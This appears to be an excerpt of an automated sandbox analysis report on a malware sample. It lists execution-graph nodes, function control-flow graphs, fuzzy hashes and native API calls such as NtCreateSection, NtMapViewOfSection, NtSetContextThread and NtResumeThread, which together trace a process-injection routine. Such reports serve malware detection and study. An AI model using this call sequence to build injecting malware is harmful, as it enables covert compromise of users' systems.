                                                                                          • Source File: 00000005.00000002.352991123.00000000002BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 002BD000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_2bd000_op33779.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a03215431c7700aa6d9f63b8d2e83db64d9b4d821f1e853ea9c686936a1dca5e
                                                                                          • Instruction ID: 96ffd4973905e6784250022b510c8b858ec84aedb613e1aa4a4c2d322d60ef3f
                                                                                          • Opcode Fuzzy Hash: a03215431c7700aa6d9f63b8d2e83db64d9b4d821f1e853ea9c686936a1dca5e
                                                                                          • Instruction Fuzzy Hash: E5112672504240CFCB15CF10D9C4B96BF72FB94314F34C6A9D8040B216C33AD96ACBA2

                                                                                          Execution Graph

                                                                                          Execution Coverage:1.6%
                                                                                          Dynamic/Decrypted Code Coverage:2%
                                                                                          Signature Coverage:15.9%
                                                                                          Total number of Nodes:252
                                                                                          Total number of Limit Nodes:24
                                                                                          execution_graph 78780 1d9d2f 78781 1d9d33 78780->78781 78782 1ebf43 NtClose 78781->78782 78783 1d9db2 78782->78783 78784 1c1b24 78785 1c1b2a 78784->78785 78788 1ef333 78785->78788 78791 1ed983 78788->78791 78792 1ed9a9 78791->78792 78803 1c73f3 78792->78803 78794 1ed9bf 78802 1c1c4b 78794->78802 78806 1dbfe3 78794->78806 78796 1ed9de 78797 1ed9f3 78796->78797 78821 1ec293 78796->78821 78817 1e8813 78797->78817 78800 1eda02 78801 1ec293 ExitProcess 78800->78801 78801->78802 78824 1d7a63 78803->78824 78805 1c7400 78805->78794 78807 1dc00f 78806->78807 78835 1dbed3 78807->78835 78810 1dc03c 78811 1ebf43 NtClose 78810->78811 78814 1dc047 78810->78814 78811->78814 78812 1dc054 78813 1dc070 78812->78813 78815 1ebf43 NtClose 78812->78815 78813->78796 78814->78796 78816 1dc066 78815->78816 78816->78796 78818 1e886d 78817->78818 78820 1e887a 78818->78820 78846 1d96f3 78818->78846 78820->78800 78822 1ec2b0 78821->78822 78823 1ec2c1 ExitProcess 78822->78823 78823->78797 78825 1d7a7a 78824->78825 78827 1d7a8f 78825->78827 78828 1ec933 78825->78828 78827->78805 78830 1ec94b 78828->78830 78829 1ec96f 78829->78827 78830->78829 78831 1eb6d3 LdrInitializeThunk 78830->78831 78832 1ec9c0 78831->78832 78833 1edd93 RtlFreeHeap 78832->78833 78834 1ec9d9 78833->78834 78834->78827 78836 1dbeed 78835->78836 78840 1dbfc9 78835->78840 78841 1eb773 78836->78841 78839 1ebf43 NtClose 78839->78840 78840->78810 78840->78812 78842 1eb78d 78841->78842 78845 ad07ac LdrInitializeThunk 78842->78845 78843 1dbfbd 78843->78839 78845->78843 78849 1d971d 78846->78849 78847 1d9b8b 78847->78820 78849->78847 78870 1e4f13 78849->78870 78850 1d97bc 78850->78847 78873 1d54c3 78850->78873 78852 1d982a 78852->78847 78853 1edd93 RtlFreeHeap 78852->78853 78855 1d9842 78853->78855 78854 1d9874 78860 1d987b 78854->78860 78883 1dc083 78854->78883 78855->78854 78879 1c6f73 78855->78879 78857 1d98b4 78857->78847 78894 1eb873 78857->78894 78860->78847 78861 1eb3e3 NtSetContextThread 78860->78861 78863 1d9931 78861->78863 78862 1d9b1a 78865 1eb4e3 NtResumeThread 78862->78865 78866 1d9b3d 78862->78866 78863->78862 78890 1c6fe3 78863->78890 78865->78866 78867 1dc253 NtDelayExecution 78866->78867 78868 1d9b5a 78866->78868 78867->78866 78869 1ec293 ExitProcess 78868->78869 78869->78847 78899 1edd03 78870->78899 78872 1e4f34 78872->78850 78874 1d5529 78873->78874 78876 1d54e2 78873->78876 78875 1d5600 78874->78875 78911 1d4f13 78874->78911 78875->78852 78876->78874 78876->78875 78877 1dc253 NtDelayExecution 78876->78877 78877->78876 78880 1c6fa3 78879->78880 78881 1dc253 NtDelayExecution 78880->78881 78882 1c6fc4 78880->78882 78881->78880 78882->78854 78884 1dc0a0 78883->78884 78919 1eb7c3 78884->78919 78886 1dc0f0 78887 1dc0f7 78886->78887 78888 1eb873 NtMapViewOfSection 78886->78888 78887->78857 78889 1dc120 78888->78889 78889->78857 78891 1c7003 78890->78891 78892 1dc253 NtDelayExecution 78891->78892 78893 1c7023 78891->78893 78892->78891 78893->78862 78895 1eb894 78894->78895 78897 1eb8e9 78894->78897 78928 1cb2e3 78895->78928 78897->78860 78898 1eb8e2 78898->78860 78902 1ec073 78899->78902 78901 1edd34 78901->78872 78903 1ec094 78902->78903 78904 1ec0d9 78902->78904 78907 1cbfd3 78903->78907 78904->78901 78906 1ec0d2 78906->78901 78910 1cbff8 78907->78910 78908 1cc115 NtAllocateVirtualMemory 78909 1cc140 78908->78909 78909->78906 78910->78908 78914 1ec163 78911->78914 78915 1ec17d 78914->78915 78918 acfb68 LdrInitializeThunk 78915->78918 78916 1d4f35 78916->78875 78918->78916 78920 1eb82d 78919->78920 78921 1eb7e4 78919->78921 78920->78886 78924 1cb0c3 78921->78924 78923 1eb826 78923->78886 78927 1cb0e8 78924->78927 78925 1cb205 NtCreateSection 78926 1cb234 78925->78926 78926->78923 78927->78925 78929 1cb308 78928->78929 78930 1cb425 NtMapViewOfSection 78929->78930 78931 1cb460 78930->78931 78931->78898 78932 acf9f0 LdrInitializeThunk 78645 1eee73 78646 1eee89 78645->78646 78647 1eee83 78645->78647 78650 1ede73 78646->78650 78649 1eeeaf 78653 1ec1f3 78650->78653 78652 1ede8e 78652->78649 78654 1ec210 78653->78654 78655 1ec21d RtlAllocateHeap 78654->78655 78655->78652 78656 1ebcd3 78657 1ebd4d 78656->78657 78658 1ebcf4 78656->78658 78661 1cb513 78658->78661 78660 1ebd46 78663 1cb538 78661->78663 78662 1cb655 NtCreateFile 78664 1cb694 78662->78664 78663->78662 78664->78660 78665 1e58d3 78666 1e58e2 78665->78666 78667 1e5929 78666->78667 78670 1e5967 78666->78670 78672 1e596c 78666->78672 78673 1edd93 78667->78673 78671 1edd93 RtlFreeHeap 78670->78671 78671->78672 78676 1ec243 78673->78676 78675 1e5939 78677 1ec260 78676->78677 78678 1ec26d RtlFreeHeap 78677->78678 78678->78675 78933 1ebe03 78934 1ebe27 78933->78934 78937 1ebe78 78933->78937 78938 1cb743 78934->78938 78936 1ebe71 78939 1cb768 78938->78939 78940 1cb885 NtReadFile 78939->78940 78941 1cb8bc 78940->78941 78941->78936 78942 1e5543 78943 1e555f 78942->78943 78944 1e559b 78943->78944 78945 1e5587 78943->78945 78947 1ebf43 NtClose 78944->78947 78946 1ebf43 NtClose 78945->78946 78948 1e5590 78946->78948 78949 1e55a4 78947->78949 78952 1edeb3 RtlAllocateHeap 78949->78952 78951 1e55af 78952->78951 78953 1eb683 78954 1eb69d 78953->78954 78957 acfdc0 LdrInitializeThunk 78954->78957 78955 1eb6c1 78957->78955 78679 1d5393 78680 1d53ad 78679->78680 78685 1d8ba3 78680->78685 78682 1d53cb 78683 1d5410 78682->78683 78684 1d53ff PostThreadMessageW 78682->78684 78684->78683 78686 1d8bc7 78685->78686 78687 1d8bce 78686->78687 78688 1d8c03 LdrLoadDll 78686->78688 78687->78682 78688->78687 78689 1dc1d3 78690 1dc217 78689->78690 78695 1dc238 78690->78695 78696 1eb463 78690->78696 78692 1dc228 78693 1dc244 78692->78693 78701 1ebf43 78692->78701 78697 1eb487 78696->78697 78698 1eb4bc 78696->78698 78704 1ca673 78697->78704 78698->78692 78700 1eb4b5 78700->78692 78702 1ebf5d 78701->78702 78703 1ebf6a NtClose 78702->78703 78703->78695 78707 1ca698 78704->78707 78705 1ca7b5 NtSuspendThread 78706 1ca7d0 78705->78706 78706->78700 78707->78705 78708 1db6f3 78709 1db70b 78708->78709 78711 1db765 78708->78711 78709->78711 78712 1df2f3 78709->78712 78713 1df319 78712->78713 78714 1df532 78713->78714 78735 1eefa3 78713->78735 78714->78711 78716 1df3ab 78716->78714 78717 1df479 78716->78717 78741 1eb6d3 78716->78741 78726 1df498 78717->78726 78751 1d9dd3 NtMapViewOfSection 78717->78751 78721 1df461 78747 1dc253 78721->78747 78723 1df442 78746 1e7f83 NtDelayExecution 78723->78746 78724 1df410 78724->78714 78724->78721 78724->78723 78745 1d9dd3 NtMapViewOfSection 78724->78745 78725 1df51a 78729 1dc253 NtDelayExecution 78725->78729 78726->78725 78752 1eb3e3 78726->78752 78731 1df528 78729->78731 78731->78711 78733 1df50b 78757 1eb4e3 78733->78757 78736 1eef13 78735->78736 78737 1eef70 78736->78737 78738 1ede73 RtlAllocateHeap 78736->78738 78737->78716 78739 1eef4d 78738->78739 78740 1edd93 RtlFreeHeap 78739->78740 78740->78737 78742 1eb6ed 78741->78742 78762 acfae8 LdrInitializeThunk 78742->78762 78743 1df407 78743->78717 78743->78724 78745->78723 78746->78721 78748 1dc266 78747->78748 78763 1eb603 78748->78763 78750 1dc291 78750->78711 78751->78726 78753 1eb43c 78752->78753 78754 1eb407 78752->78754 78753->78733 78772 1caa93 78754->78772 78756 1eb435 78756->78733 78758 1eb539 78757->78758 78759 1eb504 78757->78759 78758->78725 78776 1caca3 78759->78776 78761 1eb532 78761->78725 78762->78743 78764 1eb627 78763->78764 78765 1eb65c 78763->78765 78768 1cbbb3 78764->78768 78765->78750 78767 1eb655 78767->78750 78771 1cbbd8 78768->78771 78769 1cbcf5 NtDelayExecution 78770 1cbd11 78769->78770 78770->78767 78771->78769 78773 1caab8 78772->78773 78774 1cabd5 NtSetContextThread 78773->78774 78775 1cabf0 78774->78775 78775->78756 78779 1cacc8 78776->78779 78777 1cade5 NtResumeThread 78778 1cae00 78777->78778 78778->78761 78779->78777

                                                                                          Executed Functions

                                                                                          Function 001CB513 Relevance: 1.7, APIs: 1, Instructions: 188filenativeCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 56 1cb513-1cb577 call 1ca113 call 1ca123 61 1cb57d-1cb5c2 call 1ca1b3 call 1ef3b2 call 1ca083 call 1ef3b2 56->61 62 1cb655-1cb68e NtCreateFile 56->62 84 1cb5cd-1cb5d3 61->84 64 1cb72b-1cb737 62->64 65 1cb694-1cb69b 62->65 67 1cb6a6-1cb6ac 65->67 69 1cb6ae-1cb6d2 67->69 70 1cb6d4-1cb6d8 67->70 69->67 73 1cb71a-1cb728 call 1ca1b3 70->73 74 1cb6da-1cb6e1 70->74 73->64 76 1cb6ec-1cb6f2 74->76 76->73 79 1cb6f4-1cb718 76->79 79->76 85 1cb5fb-1cb5ff 84->85 86 1cb5d5-1cb5f9 84->86 85->62 88 1cb601-1cb61c 85->88 86->84 89 1cb627-1cb62d 88->89 89->62 90 1cb62f-1cb653 89->90 90->89
                                                                                          APIs
                                                                                          • NtCreateFile.NTDLL(?,?,?,?,?,?,00000000,?,?,?,?), ref: 001CB681
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401576977.00000000001C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_1c0000_op33779.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateFile
                                                                                          • String ID:
                                                                                          • API String ID: 823142352-0
                                                                                          • Opcode ID: d675ffe184b4cf3df129620c1f37ed63615b89ad24ad60a713524158cd36fee6
                                                                                          • Instruction ID: 80dbad56aee35a512adc715ec84dc190d6642628974ae3963a2c43f6fb5ce1bb
                                                                                          • Opcode Fuzzy Hash: d675ffe184b4cf3df129620c1f37ed63615b89ad24ad60a713524158cd36fee6
                                                                                          • Instruction Fuzzy Hash: 978117B1E081589FCB05CFA9C991AEDBBF5AF9C304F188159E859A7341D734A942CF60
                                                                                          Function 001CB2E3 Relevance: 1.7, APIs: 1, Instructions: 186nativeCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 92 1cb2e3-1cb347 call 1ca113 call 1ca123 97 1cb34d-1cb392 call 1ca1b3 call 1ef3b2 call 1ca083 call 1ef3b2 92->97 98 1cb425-1cb45a NtMapViewOfSection 92->98 120 1cb39d-1cb3a3 97->120 100 1cb4f7-1cb503 98->100 101 1cb460-1cb467 98->101 103 1cb472-1cb478 101->103 105 1cb47a-1cb49e 103->105 106 1cb4a0-1cb4a4 103->106 105->103 109 1cb4e6-1cb4f4 call 1ca1b3 106->109 110 1cb4a6-1cb4ad 106->110 109->100 113 1cb4b8-1cb4be 110->113 113->109 116 1cb4c0-1cb4e4 113->116 116->113 121 1cb3cb-1cb3cf 120->121 122 1cb3a5-1cb3c9 120->122 121->98 124 1cb3d1-1cb3ec 121->124 122->120 125 1cb3f7-1cb3fd 124->125 125->98 126 1cb3ff-1cb423 125->126 126->125
                                                                                          APIs
                                                                                          • NtMapViewOfSection.NTDLL(?,00000000,00000000,00000000,?,?,00000000,?,001C7134,?,?,?,00000000), ref: 001CB44D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401576977.00000000001C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_1c0000_op33779.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: SectionView
                                                                                          • String ID:
                                                                                          • API String ID: 1323581903-0
                                                                                          • Opcode ID: c8cf07480daa701a2a6a95d8220c56878a179f3d73bf5b45c1068934c0e84736
                                                                                          • Instruction ID: b75fe5367544b605506178e9cc5dd4093aab25e12346e5398272f581d89b3d5c
                                                                                          • Opcode Fuzzy Hash: c8cf07480daa701a2a6a95d8220c56878a179f3d73bf5b45c1068934c0e84736
                                                                                          • Instruction Fuzzy Hash: 1A7127B1E08158DFCB09CFA9C891AEDBBF5BF99304F188199E859A7341D734A941CF60
                                                                                          Function 001CB743 Relevance: 1.7, APIs: 1, Instructions: 184filenativeCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 128 1cb743-1cb762 129 1cb768-1cb7a7 call 1ca123 128->129 130 1cb763 call 1ca113 128->130 133 1cb7ad-1cb7f2 call 1ca1b3 call 1ef3b2 call 1ca083 call 1ef3b2 129->133 134 1cb885-1cb8b6 NtReadFile 129->134 130->129 156 1cb7fd-1cb803 133->156 136 1cb8bc-1cb8c3 134->136 137 1cb953-1cb95f 134->137 139 1cb8ce-1cb8d4 136->139 141 1cb8fc-1cb900 139->141 142 1cb8d6-1cb8fa 139->142 145 1cb942-1cb950 call 1ca1b3 141->145 146 1cb902-1cb909 141->146 142->139 145->137 148 1cb914-1cb91a 146->148 148->145 152 1cb91c-1cb940 148->152 152->148 157 1cb82b-1cb82f 156->157 158 1cb805-1cb829 156->158 157->134 159 1cb831-1cb84c 157->159 158->156 161 1cb857-1cb85d 159->161 161->134 162 1cb85f-1cb883 161->162 162->161
                                                                                          APIs
                                                                                          • NtReadFile.NTDLL(?,?,?,?,?,?,00000000,?,?), ref: 001CB8A9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401576977.00000000001C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_1c0000_op33779.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FileRead
                                                                                          • String ID:
                                                                                          • API String ID: 2738559852-0
                                                                                          • Opcode ID: 7406610fe4a71597561f2b8bae0021fa1a59eb1c802fb029ede16d8a052d8adc
                                                                                          • Instruction ID: 8adb5b117fcb2aa3c6cbc0e3ab99f13c8590f27c5c3665861e1b3b8188165155
                                                                                          • Opcode Fuzzy Hash: 7406610fe4a71597561f2b8bae0021fa1a59eb1c802fb029ede16d8a052d8adc
                                                                                          • Instruction Fuzzy Hash: A67138B1E08158DBCB09CFA9C891AEDBBF5BF98304F188159E859A7341D734A941CFA4
                                                                                          Function 001CB0C3 Relevance: 1.7, APIs: 1, Instructions: 180nativeCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 164 1cb0c3-1cb0e2 165 1cb0e8-1cb127 call 1ca123 164->165 166 1cb0e3 call 1ca113 164->166 169 1cb12d-1cb172 call 1ca1b3 call 1ef3b2 call 1ca083 call 1ef3b2 165->169 170 1cb205-1cb22e NtCreateSection 165->170 166->165 192 1cb17d-1cb183 169->192 172 1cb2cb-1cb2d7 170->172 173 1cb234-1cb23b 170->173 175 1cb246-1cb24c 173->175 177 1cb24e-1cb272 175->177 178 1cb274-1cb278 175->178 177->175 181 1cb2ba-1cb2c8 call 1ca1b3 178->181 182 1cb27a-1cb281 178->182 181->172 184 1cb28c-1cb292 182->184 184->181 188 1cb294-1cb2b8 184->188 188->184 193 1cb1ab-1cb1af 192->193 194 1cb185-1cb1a9 192->194 193->170 195 1cb1b1-1cb1cc 193->195 194->192 197 1cb1d7-1cb1dd 195->197 197->170 198 1cb1df-1cb203 197->198 198->197
                                                                                          APIs
                                                                                          • NtCreateSection.NTDLL(?,00000000,000F001F,?,?,001C70F1,00000000,?,?,08000000), ref: 001CB221
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401576977.00000000001C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_1c0000_op33779.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateSection
                                                                                          • String ID:
                                                                                          • API String ID: 2449625523-0
                                                                                          • Opcode ID: adff89788c227dfb02b330619a6bccec0f9c373fd36e43cb928eaab211708a8b
                                                                                          • Instruction ID: 90af9a7c364f0dd29cc4bbce8a6880e68d2366335c8bb419020092a99a72b255
                                                                                          • Opcode Fuzzy Hash: adff89788c227dfb02b330619a6bccec0f9c373fd36e43cb928eaab211708a8b
                                                                                          • Instruction Fuzzy Hash: 667108B1E08158DBCB05CFA9D891BEDBBF2BF59304F188199E859A7341D734A942CF90
                                                                                          Function 001CBFD3 Relevance: 1.7, APIs: 1, Instructions: 178memorynativeCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 200 1cbfd3-1cc037 call 1ca113 call 1ca123 205 1cc03d-1cc082 call 1ca1b3 call 1ef3b2 call 1ca083 call 1ef3b2 200->205 206 1cc115-1cc13a NtAllocateVirtualMemory 200->206 228 1cc08d-1cc093 205->228 208 1cc1d7-1cc1e3 206->208 209 1cc140-1cc147 206->209 211 1cc152-1cc158 209->211 212 1cc15a-1cc17e 211->212 213 1cc180-1cc184 211->213 212->211 215 1cc1c6-1cc1d4 call 1ca1b3 213->215 216 1cc186-1cc18d 213->216 215->208 220 1cc198-1cc19e 216->220 220->215 223 1cc1a0-1cc1c4 220->223 223->220 229 1cc0bb-1cc0bf 228->229 230 1cc095-1cc0b9 228->230 229->206 232 1cc0c1-1cc0dc 229->232 230->228 233 1cc0e7-1cc0ed 232->233 233->206 234 1cc0ef-1cc113 233->234 234->233
                                                                                          APIs
                                                                                          • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 001CC12D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401576977.00000000001C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_1c0000_op33779.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AllocateMemoryVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 2167126740-0
                                                                                          • Opcode ID: af22745c9356b21275a4ed7ec95143a4cc00c792e14a36387ff7ba92eb16b96b
                                                                                          • Instruction ID: 52121563a30c57fc5c5d0457fef9495661317d000296c6418a320a5edcbc2b57
                                                                                          • Opcode Fuzzy Hash: af22745c9356b21275a4ed7ec95143a4cc00c792e14a36387ff7ba92eb16b96b
                                                                                          • Instruction Fuzzy Hash: 1C711AB1E04158DFCB05CFA9C890AEDBBF1AF59304F1881A9E859A7341D734AD51CF94
                                                                                          Function 001CAA93 Relevance: 1.7, APIs: 1, Instructions: 170nativethreadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 272 1caa93-1caaf7 call 1ca113 call 1ca123 277 1caafd-1cab42 call 1ca1b3 call 1ef3b2 call 1ca083 call 1ef3b2 272->277 278 1cabd5-1cabea NtSetContextThread 272->278 300 1cab4d-1cab53 277->300 280 1cac87-1cac93 278->280 281 1cabf0-1cabf7 278->281 283 1cac02-1cac08 281->283 284 1cac0a-1cac2e 283->284 285 1cac30-1cac34 283->285 284->283 288 1cac76-1cac84 call 1ca1b3 285->288 289 1cac36-1cac3d 285->289 288->280 292 1cac48-1cac4e 289->292 292->288 295 1cac50-1cac74 292->295 295->292 301 1cab7b-1cab7f 300->301 302 1cab55-1cab79 300->302 301->278 304 1cab81-1cab9c 301->304 302->300 305 1caba7-1cabad 304->305 305->278 306 1cabaf-1cabd3 305->306 306->305
                                                                                          APIs
                                                                                          • NtSetContextThread.NTDLL(?,?), ref: 001CABDD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401576977.00000000001C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_1c0000_op33779.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ContextThread
                                                                                          • String ID:
                                                                                          • API String ID: 1591575202-0
                                                                                          • Opcode ID: 7d3590489634a5643a165557ae1e62707ac94800af8139a2bf38665b0a25d032
                                                                                          • Instruction ID: 8f29e4ec82478bcb9a95e5c761cb2fbf3ed2ac3ab5c392222c42f5a107a0116a
                                                                                          • Opcode Fuzzy Hash: 7d3590489634a5643a165557ae1e62707ac94800af8139a2bf38665b0a25d032
                                                                                          • Instruction Fuzzy Hash: 20715AB1E0415CDFCB05CFA8C890BEDBBB2AF59304F5881A9E419A7341D734AA41DF95
                                                                                          Function 001CBBB3 Relevance: 1.7, APIs: 1, Instructions: 170nativeCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 344 1cbbb3-1cbc17 call 1ca113 call 1ca123 349 1cbc1d-1cbc62 call 1ca1b3 call 1ef3b2 call 1ca083 call 1ef3b2 344->349 350 1cbcf5-1cbd0b NtDelayExecution 344->350 372 1cbc6d-1cbc73 349->372 352 1cbda8-1cbdb4 350->352 353 1cbd11-1cbd18 350->353 354 1cbd23-1cbd29 353->354 357 1cbd2b-1cbd4f 354->357 358 1cbd51-1cbd55 354->358 357->354 360 1cbd97-1cbda5 call 1ca1b3 358->360 361 1cbd57-1cbd5e 358->361 360->352 365 1cbd69-1cbd6f 361->365 365->360 368 1cbd71-1cbd95 365->368 368->365 373 1cbc9b-1cbc9f 372->373 374 1cbc75-1cbc99 372->374 373->350 375 1cbca1-1cbcbc 373->375 374->372 377 1cbcc7-1cbccd 375->377 377->350 378 1cbccf-1cbcf3 377->378 378->377
                                                                                          APIs
                                                                                          • NtDelayExecution.NTDLL(001DC291,?,?,?,00000000), ref: 001CBCFE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401576977.00000000001C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_1c0000_op33779.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: DelayExecution
                                                                                          • String ID:
                                                                                          • API String ID: 1249177460-0
                                                                                          • Opcode ID: 10f784cb7a7465b49218334df4e70ac1398cacb19b884e6fb5fd4ed04110ac16
                                                                                          • Instruction ID: 6d8641f24f5606b7259ca088cc6d022df4f9a281e648668ae767fdfbf8c328c0
                                                                                          • Opcode Fuzzy Hash: 10f784cb7a7465b49218334df4e70ac1398cacb19b884e6fb5fd4ed04110ac16
                                                                                          • Instruction Fuzzy Hash: 29714AB1E08258DFCB05CFA9C491BEDBBF1AF59304F1880A9E85AA7341D734AA41DF54
                                                                                          Function 001CACA3 Relevance: 1.7, APIs: 1, Instructions: 170nativethreadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 308 1caca3-1cacc2 309 1cacc8-1cad07 call 1ca123 308->309 310 1cacc3 call 1ca113 308->310 313 1cad0d-1cad52 call 1ca1b3 call 1ef3b2 call 1ca083 call 1ef3b2 309->313 314 1cade5-1cadfa NtResumeThread 309->314 310->309 336 1cad5d-1cad63 313->336 315 1cae97-1caea3 314->315 316 1cae00-1cae07 314->316 318 1cae12-1cae18 316->318 320 1cae1a-1cae3e 318->320 321 1cae40-1cae44 318->321 320->318 324 1cae86-1cae94 call 1ca1b3 321->324 325 1cae46-1cae4d 321->325 324->315 328 1cae58-1cae5e 325->328 328->324 332 1cae60-1cae84 328->332 332->328 337 1cad8b-1cad8f 336->337 338 1cad65-1cad89 336->338 337->314 339 1cad91-1cadac 337->339 338->336 341 1cadb7-1cadbd 339->341 341->314 342 1cadbf-1cade3 341->342 342->341
                                                                                          APIs
                                                                                          • NtResumeThread.NTDLL(001C71D5,?,?,?,?), ref: 001CADED
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401576977.00000000001C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_1c0000_op33779.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ResumeThread
                                                                                          • String ID:
                                                                                          • API String ID: 947044025-0
                                                                                          • Opcode ID: e82c6908598d20ec0be45675678c3b10373641ab3eec8e70e69c302ce30f2250
                                                                                          • Instruction ID: 31d8266ff65a4d152b6a6818dc369b4c0a4c2d62691e1e12373ceeac2dd2ef8a
                                                                                          • Opcode Fuzzy Hash: e82c6908598d20ec0be45675678c3b10373641ab3eec8e70e69c302ce30f2250
                                                                                          • Instruction Fuzzy Hash: CE7148B1E0415CDFCB05CFA9C890BEDBBB1AF59308F1880A9E459A7341D734AA41DF91
                                                                                          Function 001CA673 Relevance: 1.7, APIs: 1, Instructions: 170nativethreadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 236 1ca673-1ca6d7 call 1ca113 call 1ca123 241 1ca6dd-1ca722 call 1ca1b3 call 1ef3b2 call 1ca083 call 1ef3b2 236->241 242 1ca7b5-1ca7ca NtSuspendThread 236->242 264 1ca72d-1ca733 241->264 243 1ca867-1ca873 242->243 244 1ca7d0-1ca7d7 242->244 246 1ca7e2-1ca7e8 244->246 248 1ca7ea-1ca80e 246->248 249 1ca810-1ca814 246->249 248->246 252 1ca856-1ca864 call 1ca1b3 249->252 253 1ca816-1ca81d 249->253 252->243 255 1ca828-1ca82e 253->255 255->252 258 1ca830-1ca854 255->258 258->255 265 1ca75b-1ca75f 264->265 266 1ca735-1ca759 264->266 265->242 268 1ca761-1ca77c 265->268 266->264 269 1ca787-1ca78d 268->269 269->242 270 1ca78f-1ca7b3 269->270 270->269
                                                                                          APIs
                                                                                          • NtSuspendThread.NTDLL(?,?), ref: 001CA7BD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401576977.00000000001C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_1c0000_op33779.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: SuspendThread
                                                                                          • String ID:
                                                                                          • API String ID: 3178671153-0
                                                                                          • Opcode ID: df1744cd3ab3c9e63664b9d7c7920faaf1bd56dff2a6f15b324ade073ee0abe8
                                                                                          • Instruction ID: f63e9eac35f0d38c4edba35a6b369b554a63880081846cacd43484c1106f99ee
                                                                                          • Opcode Fuzzy Hash: df1744cd3ab3c9e63664b9d7c7920faaf1bd56dff2a6f15b324ade073ee0abe8
                                                                                          • Instruction Fuzzy Hash: D37138B1E0425CDFCB05CFA9C890AEDBBB1BF59304F5881A9E859A7341D734A942CF91
                                                                                          Function 001D8BA3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 380 1d8ba3-1d8bbf 381 1d8bc7-1d8bcc 380->381 382 1d8bc2 call 1eea93 380->382 383 1d8bce-1d8bd1 381->383 384 1d8bd2-1d8be0 call 1eefb3 381->384 382->381 387 1d8bf0-1d8c01 call 1ed453 384->387 388 1d8be2-1d8bed call 1ef253 384->388 393 1d8c1a-1d8c1d 387->393 394 1d8c03-1d8c17 LdrLoadDll 387->394 388->387 394->393
                                                                                          APIs
                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 001D8C15
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.401576977.00000000001C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
